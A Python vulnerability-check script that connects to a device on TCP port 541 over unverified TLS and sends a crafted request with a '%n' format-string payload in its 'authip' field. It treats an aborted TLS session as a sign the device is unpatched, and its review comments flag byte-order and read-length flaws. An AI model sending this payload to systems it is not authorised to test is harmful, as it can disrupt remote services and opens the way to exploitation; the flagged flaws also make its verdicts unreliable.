import socket
import ssl
import struct
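def check_vulnerability(hostname):
    """Heuristically probe ``hostname`` on TCP/541 and return True if it looks affected.

    The check opens a TLS 1.2 session with certificate verification disabled
    (``check_hostname=False``, ``CERT_NONE``), reads the server's first packet,
    then sends a request whose ``authip`` field holds a ``%n`` format
    specifier.  The outcome is classified as follows:

    * ``ssl.SSLError`` whose text contains "tlsv1 alert" or "unexpected
      message" -> True (the session was torn down, which is the behaviour the
      author expects from an unpatched device).
    * Any response, no response, connection/handshake failure, malformed
      header or other socket/SSL error -> False.  False therefore covers both
      "answered" and "inconclusive"; callers must not read it as "patched".

    The probe is expected to abort the remote session on an affected device,
    so a True result is a signal for further investigation, not proof, and the
    service on the target may not be left in a clean state.

    Args:
        hostname: DNS name or IPv4 address of the device to probe (AF_INET only).

    Returns:
        bool: True only when the TLS session was aborted with one of the alert
        strings above; False on every other path.  A diagnostic line is
        printed to stdout on every path.
    """
    # PROTOCOL_TLSv1_2 pins the version; the constant is deprecated since 3.10
    # but still pins exactly what the original did.
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE  # identity of the peer is irrelevant to the probe
    context.options |= ssl.OP_NO_COMPRESSION

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(5)  # governs connect, the handshake and every recv below
        try:
            sock.connect((hostname, 541))
        except socket.error as e:
            print(f"[-] Could not connect to {hostname}: {e}")
            return False

        try:
            with context.wrap_socket(sock, server_hostname=hostname, suppress_ragged_eofs=True) as ssock:
                initial_data = ssock.recv(1024)
                if not initial_data:
                    print("[-] No initial data received from server.")
                    return False

                if len(initial_data) < 8:
                    print("[-] Initial data received is too short.")
                    return False

                # Bytes 4..7 of the greeting are read as the packet length; the
                # first four bytes are not used by this check.
                # NOTE(review): 'i' is native byte order and signed, while the
                # request built below writes its own length big-endian — on a
                # little-endian host the two disagree.  Which order the server
                # really uses cannot be confirmed from this file.
                pkt_len = struct.unpack('i', initial_data[4:8])[0] - 2
                remaining = pkt_len - 8
                # pkt_len is attacker/network-controlled: a negative value would
                # make recv() raise ValueError, which none of the handlers below
                # catch, so the script would die with a traceback.
                if remaining < 0:
                    print("[-] Invalid packet length in initial data.")
                    return False

                # NOTE(review): any body bytes that already arrived in the 1024-byte
                # greeting read are not subtracted here, so if the server sent the
                # whole packet at once this read waits until the socket timeout.
                payload = ssock.recv(remaining)
                if len(payload) < remaining:
                    print("[-] Incomplete payload received.")
                    return False

                format_string_payload = b"reply 200\r\nrequest=auth\r\nauthip=%n\r\n\r\n\x00"
                packet = b''.join((
                    (0x0001e034).to_bytes(4, 'little'),
                    (len(format_string_payload) + 8).to_bytes(4, 'big'),
                    format_string_payload,
                ))

                # sendall(): plain send() may deliver only part of the buffer.
                ssock.sendall(packet)
                response = ssock.recv(1024)
                if response:
                    print("[+] Device is likely not vulnerable - received response.")
                    return False
                else:
                    # Inconclusive, but deliberately still reported as False.
                    print("[+] No response received - further analysis needed.")
                    return False
        # ssl.SSLError is an OSError subclass, so it must be listed before
        # socket.error or the alert heuristic below would never run.
        except ssl.SSLError as ssl_err:
            if "tlsv1 alert" in str(ssl_err).lower() or "unexpected message" in str(ssl_err).lower():
                print(f"[+] Device {hostname} might be vulnerable. Connection aborted as expected.")
                return True
            else:
                print(f"[-] Unexpected SSL error: {ssl_err}")
                return False
        except socket.error as sock_err:
            # Includes socket.timeout on any of the reads above.
            print(f"[-] Socket error: {sock_err}")
            return False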
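def main():
    """Interactive loop: read hostnames from stdin and report the probe result.

    Typing ``exit`` (any case) or sending EOF / Ctrl-C ends the loop; blank
    lines and surrounding whitespace are ignored.  ``check_vulnerability``
    returns False both when the device answered and when the probe was
    inconclusive, so the "appears to be patched" line below also covers
    inconclusive results.
    """
    while True:
        try:
            hostname = input("Enter the hostname to check (or 'exit' to quit): ")
        except (EOFError, KeyboardInterrupt):
            # Ctrl-D / Ctrl-C at the prompt: leave quietly instead of a traceback.
            print()
            break
        hostname = hostname.strip()
        if hostname.lower() == 'exit':
            break
        if not hostname:
            continue  # nothing to probe on an empty line
        is_vulnerable = check_vulnerability(hostname)
        if is_vulnerable:
            print(f"[!] Warning: {hostname} is vulnerable!")
        else:
            print(f"[+] {hostname} appears to be patched.")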
if __name__ == "__main__":
    # Start the interactive prompt only when run as a script, not on import.
    main()